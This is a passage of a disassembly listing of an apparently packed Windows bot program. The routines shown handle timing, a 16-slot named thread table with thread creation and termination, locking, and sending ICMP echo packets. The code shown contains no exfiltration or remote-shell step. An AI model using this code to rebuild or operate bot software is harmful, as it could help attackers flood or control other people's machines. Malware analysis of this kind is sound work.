var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409307
jg short loc_4092CC
cmp [ebp+var_8], 0
jbe short loc_409307
loc_4092CC: ; CODE XREF: sub_4092A4+20�j
cmp [ebp+var_C], 0
jl short loc_409307
jg short loc_4092DA
cmp [ebp+var_10], 0
jbe short loc_409307
loc_4092DA: ; CODE XREF: sub_4092A4+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
jmp short locret_409316
; ---------------------------------------------------------------------------
loc_409307: ; CODE XREF: sub_4092A4+1E�j
; sub_4092A4+26�j ...
call dword_4170D0 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
locret_409316: ; CODE XREF: sub_4092A4+61�j
leave
retn
sub_4092A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409318 proc near ; CODE XREF: sub_408B30:loc_408BBC�p
; sub_40A9CF:loc_40C715�p
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call dword_4170D8 ; QueryPerformanceCounter
lea eax, [ebp+var_10]
push eax
call dword_4170D4 ; QueryPerformanceFrequency
cmp [ebp+var_4], 0
jl short loc_409381
jg short loc_409340
cmp [ebp+var_8], 0
jbe short loc_409381
loc_409340: ; CODE XREF: sub_409318+20�j
cmp [ebp+var_C], 0
jl short loc_409381
jg short loc_40934E
cmp [ebp+var_10], 0
jbe short loc_409381
loc_40934E: ; CODE XREF: sub_409318+2E�j
push [ebp+var_C]
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_8]
call sub_416D10
mov dword ptr [ebp+var_18], eax
mov dword ptr [ebp+var_18+4], edx
fild [ebp+var_18]
push ecx
push ecx
fstp [esp+20h+var_20]
call sub_416CFE ; ceil
pop ecx
pop ecx
call sub_416CF8 ; _ftol
sub eax, dword_41E360
jmp short locret_40938D
; ---------------------------------------------------------------------------
loc_409381: ; CODE XREF: sub_409318+1E�j
; sub_409318+26�j ...
call dword_4170D0 ; GetTickCount
sub eax, dword_41E360
locret_40938D: ; CODE XREF: sub_409318+67�j
leave
retn
sub_409318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40938F proc near ; CODE XREF: .packed:004168C6�p
push ebp
mov ebp, esp
and dword_41E380, 0
push 1980h
call sub_416B46 ; malloc
pop ecx
mov dword_41E388, eax
push offset dword_41E368
call sub_409C36
pop ecx
pop ebp
retn
sub_40938F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093B6 proc near ; DATA XREF: sub_409479+35�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417278
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_20], 0
and [ebp+var_1C], 0
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_1C], eax
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push [ebp+var_20]
call dword_4170DC ; IsBadCodePtr
test eax, eax
jz short loc_409431
cmp dword_41DEC8, 0
jz short loc_40942F
push [ebp+var_20]
push offset dword_419474
push offset dword_41DB3C
call sub_40D4AB
add esp, 0Ch
loc_40942F: ; CODE XREF: sub_4093B6+62�j
jmp short loc_409443
; ---------------------------------------------------------------------------
loc_409431: ; CODE XREF: sub_4093B6+59�j
push [ebp+var_1C]
call [ebp+var_20]
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_24]
jmp short loc_409468
; ---------------------------------------------------------------------------
loc_409443: ; CODE XREF: sub_4093B6:loc_40942F�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_409466
; ---------------------------------------------------------------------------
push offset aBtg ; "btg"
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_409466: ; CODE XREF: sub_4093B6+91�j
xor eax, eax
loc_409468: ; CODE XREF: sub_4093B6+8B�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4093B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409479 proc near ; CODE XREF: sub_40764D+14A�p
; sub_409BF1+2F�p ...
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 8
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_409494
xor eax, eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_409494: ; CODE XREF: sub_409479+15�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
lea eax, [ebp+var_8]
push eax
push 0
push [ebp+var_C]
push offset sub_4093B6
push 20000h
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4094D9
push [ebp+var_4]
call dword_4170A4 ; CloseHandle
push 1
pop eax
jmp short locret_4094E4
; ---------------------------------------------------------------------------
loc_4094D9: ; CODE XREF: sub_409479+50�j
push [ebp+var_C]
call sub_416B4C ; free
pop ecx
xor eax, eax
locret_4094E4: ; CODE XREF: sub_409479+19�j
; sub_409479+5E�j
leave
retn
sub_409479 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4094E6 proc near ; DATA XREF: sub_4095A4+159�o
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_19B = byte ptr -19Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417288
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov al, byte_41DEC0
mov [ebp+var_19C], al
push 60h
pop ecx
xor eax, eax
lea edi, [ebp+var_19B]
rep stosd
stosw
stosb
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
mov eax, [eax]
mov eax, [eax+10h]
mov [ebp+var_1A0], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, 14h
push eax
lea eax, [ebp+var_19C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push [ebp+arg_0]
mov eax, [ebp+arg_0]
mov eax, [eax]
call dword ptr [eax+10h]
mov [ebp+var_1A4], eax
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+var_1A4]
jmp short loc_409593
; ---------------------------------------------------------------------------
lea eax, [ebp+var_19C]
push eax
push offset aThread ; "thread"
push [ebp+var_14]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_409593: ; CODE XREF: sub_4094E6+8A�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_4094E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095A4 proc near ; CODE XREF: sub_4017AA+A2�p
; sub_401D6E+8D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
push offset dword_41E368
call sub_409C6C
pop ecx
cmp dword_41E380, 10h
jnz short loc_4095D9
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E368
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_4095D9: ; CODE XREF: sub_4095A4+18�j
cmp [ebp+arg_8], 0
jz short loc_409627
and [ebp+var_10], 0
jmp short loc_4095EC
; ---------------------------------------------------------------------------
loc_4095E5: ; CODE XREF: sub_4095A4:loc_409625�j
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_10], eax
loc_4095EC: ; CODE XREF: sub_4095A4+3F�j
cmp [ebp+var_10], 10h
jge short loc_409627
mov eax, [ebp+var_10]
imul eax, 198h
mov ecx, dword_41E388
mov eax, [ecx+eax+10h]
cmp eax, [ebp+arg_0]
jnz short loc_409625
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E368
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: sub_4095A4+64�j
jmp short loc_4095E5
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_4095A4+39�j
; sub_4095A4+4C�j
and [ebp+var_C], 0
and [ebp+var_8], 0
jmp short loc_409638
; ---------------------------------------------------------------------------
loc_409631: ; CODE XREF: sub_4095A4:loc_409672�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_409638: ; CODE XREF: sub_4095A4+8B�j
cmp [ebp+var_8], 10h
jge short loc_409674
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E388
cmp dword ptr [ecx+eax+8], 0
jnz short loc_409672
mov eax, [ebp+var_8]
imul eax, 198h
mov ecx, dword_41E388
add ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_409674
; ---------------------------------------------------------------------------
loc_409672: ; CODE XREF: sub_4095A4+AE�j
jmp short loc_409631
; ---------------------------------------------------------------------------
loc_409674: ; CODE XREF: sub_4095A4+98�j
; sub_4095A4+CC�j
cmp [ebp+var_C], 0
jnz short loc_409695
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
push offset dword_41E368
call sub_409C7A
pop ecx
xor eax, eax
jmp locret_409761
; ---------------------------------------------------------------------------
loc_409695: ; CODE XREF: sub_4095A4+D4�j
cmp [ebp+arg_4], 0
jz short loc_4096A3
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
loc_4096A3: ; CODE XREF: sub_4095A4+F5�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [eax+10h], ecx
lea eax, [ebp+arg_10]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_C]
mov eax, [ebp+var_C]
add eax, 14h
push eax
call sub_416DC6 ; vsprintf
add esp, 0Ch
and [ebp+var_4], 0
mov eax, [ebp+var_C]
and dword ptr [eax+4], 0
mov eax, dword_41E380
inc eax
mov dword_41E380, eax
cmp [ebp+arg_4], 0
jz short loc_4096EB
mov eax, [ebp+arg_4]
mov [ebp+var_14], eax
jmp short loc_4096F1
; ---------------------------------------------------------------------------
loc_4096EB: ; CODE XREF: sub_4095A4+13D�j
mov eax, [ebp+var_C]
mov [ebp+var_14], eax
loc_4096F1: ; CODE XREF: sub_4095A4+145�j
mov eax, [ebp+var_C]
add eax, 0Ch
push eax
push 0
push [ebp+var_14]
push offset sub_4094E6
push 0
push 0
call sub_416DC0 ; _beginthreadex
add esp, 18h
mov ecx, [ebp+var_C]
mov [ecx+8], eax
mov eax, [ebp+var_C]
cmp dword ptr [eax+8], 0
jnz short loc_409753
push [ebp+arg_4]
call sub_416B4C ; free
pop ecx
mov eax, dword_41E380
dec eax
mov dword_41E380, eax
push 198h
push 0
lea eax, [ebp+var_C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E368
call sub_409C7A
pop ecx
xor eax, eax
jmp short locret_409761
; ---------------------------------------------------------------------------
loc_409753: ; CODE XREF: sub_4095A4+177�j
push offset dword_41E368
call sub_409C7A
pop ecx
push 1
pop eax
locret_409761: ; CODE XREF: sub_4095A4+30�j
; sub_4095A4+7C�j ...
leave
retn
sub_4095A4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409763 proc near ; CODE XREF: sub_401244+73�p
; sub_401244+547�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push offset dword_41E368
call sub_409C6C
pop ecx
mov eax, dword_41E380
dec eax
mov dword_41E380, eax
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
call dword_4170A4 ; CloseHandle
push 198h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
push offset dword_41E368
call sub_409C7A
pop ecx
pop ebp
retn
sub_409763 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4097A7 proc near ; CODE XREF: sub_40A9CF+EBF�p
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 194h
cmp [ebp+arg_0], 0
jnz short loc_4097BB
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_4097BB: ; CODE XREF: sub_4097A7+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz short loc_409825
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E368
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E388
cmp dword ptr [ecx+eax+8], 0
jz short loc_409815
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E388
mov dword ptr [ecx+eax+4], 1
loc_409815: ; CODE XREF: sub_4097A7+3F�j
; sub_4097A7+55�j
push offset dword_41E368
call sub_409C7A
pop ecx
jmp locret_4098F1
; ---------------------------------------------------------------------------
loc_409825: ; CODE XREF: sub_4097A7+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_190]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E368
call sub_409C6C
pop ecx
mov eax, dword_41E380
mov [ebp+var_8], eax
and [ebp+var_194], 0
jmp short loc_40986A
; ---------------------------------------------------------------------------
loc_40985D: ; CODE XREF: sub_4097A7:loc_4098E1�j
mov eax, [ebp+var_194]
inc eax
mov [ebp+var_194], eax
loc_40986A: ; CODE XREF: sub_4097A7+B4�j
cmp [ebp+var_194], 10h
jnb short loc_4098E6
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E388
cmp dword ptr [ecx+eax+8], 0
jz short loc_4098E1
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
lea eax, [ebp+var_190]
push eax
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E388
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_4098D9
mov eax, [ebp+var_194]
imul eax, 198h
mov ecx, dword_41E388
mov dword ptr [ecx+eax+4], 1
loc_4098D9: ; CODE XREF: sub_4097A7+116�j
cmp [ebp+var_8], 0
jnz short loc_4098E1
jmp short loc_4098E6
; ---------------------------------------------------------------------------
loc_4098E1: ; CODE XREF: sub_4097A7+E3�j
; sub_4097A7+136�j
jmp loc_40985D
; ---------------------------------------------------------------------------
loc_4098E6: ; CODE XREF: sub_4097A7+CA�j
; sub_4097A7+138�j
push offset dword_41E368
call sub_409C7A
pop ecx
locret_4098F1: ; CODE XREF: sub_4097A7+F�j
; sub_4097A7+79�j
leave
retn
sub_4097A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098F3 proc near ; CODE XREF: sub_40A9CF+F13�p
var_19C = dword ptr -19Ch
var_198 = dword ptr -198h
var_194 = byte ptr -194h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 19Ch
cmp [ebp+arg_0], 0
jnz short loc_409907
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_409907: ; CODE XREF: sub_4098F3+D�j
push [ebp+arg_0]
call sub_407A86
pop ecx
movzx eax, al
test eax, eax
jz loc_4099B4
push [ebp+arg_0]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_4], eax
push offset dword_41E368
call sub_409C6C
pop ecx
cmp [ebp+var_4], 10h
jnb short loc_4099A4
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E388
cmp dword ptr [ecx+eax+8], 0
jz short loc_4099A4
mov eax, dword_41E380
dec eax
mov dword_41E380, eax
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E388
mov eax, [ecx+eax+8]
mov [ebp+var_8], eax
push 198h
push 0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E388
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_8]
call dword_4170E0 ; TerminateThread
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
loc_4099A4: ; CODE XREF: sub_4098F3+43�j
; sub_4098F3+59�j
push offset dword_41E368
call sub_409C7A
pop ecx
jmp locret_409AD3
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: sub_4098F3+22�j
push [ebp+arg_0]
push offset aS ; "*%s*"
push 185h
lea eax, [ebp+var_194]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41E368
call sub_409C6C
pop ecx
mov eax, dword_41E380
mov [ebp+var_C], eax
and [ebp+var_198], 0
jmp short loc_4099F9
; ---------------------------------------------------------------------------
loc_4099EC: ; CODE XREF: sub_4098F3:loc_409AC3�j
mov eax, [ebp+var_198]
inc eax
mov [ebp+var_198], eax
loc_4099F9: ; CODE XREF: sub_4098F3+F7�j
cmp [ebp+var_198], 10h
jnb loc_409AC8
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E388
cmp dword ptr [ecx+eax+8], 0
jz loc_409AC3
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
lea eax, [ebp+var_194]
push eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E388
lea eax, [ecx+eax+14h]
push eax
call sub_40A6EB
pop ecx
pop ecx
movzx eax, al
test eax, eax
jz short loc_409ABB
mov eax, dword_41E380
dec eax
mov dword_41E380, eax
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E388
mov eax, [ecx+eax+8]
mov [ebp+var_19C], eax
push 198h
push 0
mov eax, [ebp+var_198]
imul eax, 198h
mov ecx, dword_41E388
add ecx, eax
push ecx
call sub_416B6A ; memset
add esp, 0Ch
push 0
push [ebp+var_19C]
call dword_4170E0 ; TerminateThread
push [ebp+var_19C]
call dword_4170A4 ; CloseHandle
loc_409ABB: ; CODE XREF: sub_4098F3+161�j
cmp [ebp+var_C], 0
jnz short loc_409AC3
jmp short loc_409AC8
; ---------------------------------------------------------------------------
loc_409AC3: ; CODE XREF: sub_4098F3+12A�j
; sub_4098F3+1CC�j
jmp loc_4099EC
; ---------------------------------------------------------------------------
loc_409AC8: ; CODE XREF: sub_4098F3+10D�j
; sub_4098F3+1CE�j
push offset dword_41E368
call sub_409C7A
pop ecx
locret_409AD3: ; CODE XREF: sub_4098F3+F�j
; sub_4098F3+BC�j
leave
retn
sub_4098F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AD5 proc near ; DATA XREF: sub_409BF1+2A�o
var_1A8 = byte ptr -1A8h
var_10 = byte ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A8h
push 1A3h
push [ebp+arg_0]
lea eax, [ebp+var_1A8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
cmp dword_41E380, 0
jz short loc_409B25
push 10h
push dword_41E380
push offset dword_4194EC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_409B3F
; ---------------------------------------------------------------------------
loc_409B25: ; CODE XREF: sub_409AD5+30�j
push offset dword_4194CC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
pop ecx
pop ecx
xor eax, eax
jmp locret_409BED
; ---------------------------------------------------------------------------
loc_409B3F: ; CODE XREF: sub_409AD5+4E�j
push offset dword_41E368
call sub_409C6C
pop ecx
and [ebp+var_10], 0
and [ebp+var_4], 0
jmp short loc_409B5B
; ---------------------------------------------------------------------------
loc_409B54: ; CODE XREF: sub_409AD5:loc_409BDB�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_409B5B: ; CODE XREF: sub_409AD5+7D�j
cmp [ebp+var_4], 10h
jge short loc_409BE0
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E388
cmp dword ptr [ecx+eax+8], 0
jz short loc_409BDB
push offset dword_41E368
call sub_409C7A
pop ecx
push 3E8h
call dword_41709C ; Sleep
push offset dword_41E368
call sub_409C6C
pop ecx
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E388
lea eax, [ecx+eax+14h]
push eax
push [ebp+var_4]
push offset dword_4194BC
lea eax, [ebp+var_1A8]
push eax
call sub_40D53F
add esp, 10h
mov eax, [ebp+var_4]
imul eax, 198h
mov ecx, dword_41E388
cmp dword ptr [ecx+eax+4], 0
jz short loc_409BDB
jmp short loc_409BE0
; ---------------------------------------------------------------------------
loc_409BDB: ; CODE XREF: sub_409AD5+A0�j
; sub_409AD5+102�j
jmp loc_409B54
; ---------------------------------------------------------------------------
loc_409BE0: ; CODE XREF: sub_409AD5+8A�j
; sub_409AD5+104�j
push offset dword_41E368
call sub_409C7A
pop ecx
xor eax, eax
locret_409BED: ; CODE XREF: sub_409AD5+65�j
leave
retn 4
sub_409AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BF1 proc near ; CODE XREF: sub_40A9CF+AFB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_409C0B
jmp short locret_409C34
; ---------------------------------------------------------------------------
loc_409C0B: ; CODE XREF: sub_409BF1+16�j
push [ebp+arg_0]
push [ebp+var_4]
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_0]
push offset sub_409AD5
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short locret_409C34
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
locret_409C34: ; CODE XREF: sub_409BF1+18�j
; sub_409BF1+38�j
leave
retn
sub_409BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C36 proc near ; CODE XREF: sub_405FA3+9�p
; sub_40938F+1F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 18h
push 0
push [ebp+arg_0]
call sub_416B6A ; memset
add esp, 0Ch
cmp dword_41DED0, 0
jz short loc_409C61
push 80000400h
push [ebp+arg_0]
call dword_41DED0 ; InitializeCriticalSectionAndSpinCount
jmp short loc_409C6A
; ---------------------------------------------------------------------------
loc_409C61: ; CODE XREF: sub_409C36+19�j
push [ebp+arg_0]
call dword_4170E4 ; InitializeCriticalSection
loc_409C6A: ; CODE XREF: sub_409C36+29�j
pop ebp
retn
sub_409C36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C6C proc near ; CODE XREF: sub_406041+10�p
; sub_4095A4+B�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_4170EC ; RtlEnterCriticalSection
pop ebp
retn
sub_409C6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C7A proc near ; CODE XREF: sub_406041+26�p
; sub_406041+307�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_41710C ; RtlLeaveCriticalSection
pop ebp
retn
sub_409C7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C88 proc near ; CODE XREF: sub_40332B+10�p
; sub_41113B+7ED�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xadd [esi], eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409C9D proc near ; CODE XREF: sub_4042FB+17�p
; sub_4042FB+25�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
lock xchg eax, [esi]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_409C9D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409CB1 proc near ; CODE XREF: sub_409DD0+202�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
sub esp, 38h
call dword_41E38C ; IcmpCreateFile
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_409CD8
push offset aCouldNotGetAVa ; "Could not get a valid ICMP handle\n"
call sub_416DD8 ; printf
pop ecx
xor eax, eax
jmp locret_409DCE
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409CB1+13�j
push 8
push 0
lea eax, [ebp+var_18]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov al, [ebp+arg_8]
mov [ebp+var_18], al
movzx eax, [ebp+arg_10]
push eax
call sub_416DD2
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov [ebp+var_C], eax
movzx eax, [ebp+arg_10]
push eax
push 45h
push [ebp+var_C]
call sub_416B6A ; memset
add esp, 0Ch
movzx eax, [ebp+arg_10]
cmp eax, 8
jge short loc_409D26
mov [ebp+var_38], 8
jmp short loc_409D2D
; ---------------------------------------------------------------------------
loc_409D26: ; CODE XREF: sub_409CB1+6A�j
movzx eax, [ebp+arg_10]
mov [ebp+var_38], eax
loc_409D2D: ; CODE XREF: sub_409CB1+73�j
mov eax, [ebp+var_38]
add eax, 1Ch
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_416DD2
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
push [ebp+arg_C]
push [ebp+var_24]
push [ebp+var_10]
lea eax, [ebp+var_18]
push eax
movzx ax, [ebp+arg_10]
push eax
push [ebp+var_C]
push [ebp+arg_0]
push [ebp+var_1C]
call dword_41E398 ; IcmpSendEcho
mov [ebp+var_20], eax
mov [ebp+var_8], 1
cmp [ebp+var_20], 1
jz short loc_409D8D
call dword_417064 ; RtlGetLastWin32Error
mov ecx, [ebp+arg_4]
mov [ecx], eax
jmp short loc_409DA4
; ---------------------------------------------------------------------------
loc_409D8D: ; CODE XREF: sub_409CB1+CD�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov [eax+4], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov ecx, [ecx+8]
mov [eax+8], ecx
loc_409DA4: ; CODE XREF: sub_409CB1+DA�j
push [ebp+var_1C]
call dword_41E394 ; IcmpCloseHandle
mov eax, [ebp+var_C]
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_416DCC
pop ecx
mov eax, [ebp+var_10]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_416DCC
pop ecx
mov eax, [ebp+var_8]
locret_409DCE: ; CODE XREF: sub_409CB1+22�j
leave
retn
sub_409CB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DD0 proc near ; DATA XREF: sub_40A1A7+FD�o
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
